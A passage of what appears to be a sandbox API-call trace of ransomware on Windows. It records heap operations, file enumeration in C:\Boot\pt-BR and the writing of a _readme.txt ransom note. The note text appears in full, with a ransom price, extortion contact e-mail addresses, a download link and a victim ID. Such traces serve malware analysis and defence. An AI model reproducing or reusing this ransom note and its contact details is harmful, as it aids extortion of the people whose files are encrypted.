e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", lpUsedDefaultChar=0x0) returned 1116 [0142.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x321dfc8 [0142.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.879] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned 1115 [0142.879] WriteFile (in: hFile=0x6f0, lpBuffer=0x321dfc8*, nNumberOfBytesToWrite=0x45b, lpNumberOfBytesWritten=0x9dbfb64, lpOverlapped=0x0 | out: lpBuffer=0x321dfc8*, lpNumberOfBytesWritten=0x9dbfb64*=0x45b, lpOverlapped=0x0) returned 1 [0142.880] CloseHandle (hObject=0x6f0) returned 1 [0142.880] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321dfc8 | out: hHeap=0x620000) returned 1 [0142.880] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ab03c8 | out: hHeap=0x620000) returned 1 [0142.880] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ad6f98 | out: hHeap=0x620000) returned 1 [0142.880] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.880] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.880] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8c31930, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8c31930, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0142.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.881] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8c31930, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8c31930, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0142.881] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0142.881] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8c31930, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8c31930, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8c31930, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0142.881] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8c31930, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8c31930, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8c31930, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0142.881] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0142.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1730 | out: hHeap=0x620000) returned 1 [0142.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1730 [0142.881] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.896] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.896] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.896] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.896] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.896] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.896] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.896] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.896] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.896] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.896] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.896] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.896] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.896] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.896] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.896] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.896] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.896] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.896] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.896] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) 